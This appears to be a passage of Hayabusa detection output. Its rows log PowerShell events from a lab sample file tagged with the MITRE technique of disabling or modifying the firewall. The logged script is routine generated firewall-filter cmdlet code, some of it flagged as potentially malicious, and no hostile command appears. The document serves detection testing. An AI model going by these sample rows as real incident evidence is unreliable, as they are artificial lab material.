[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.028 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
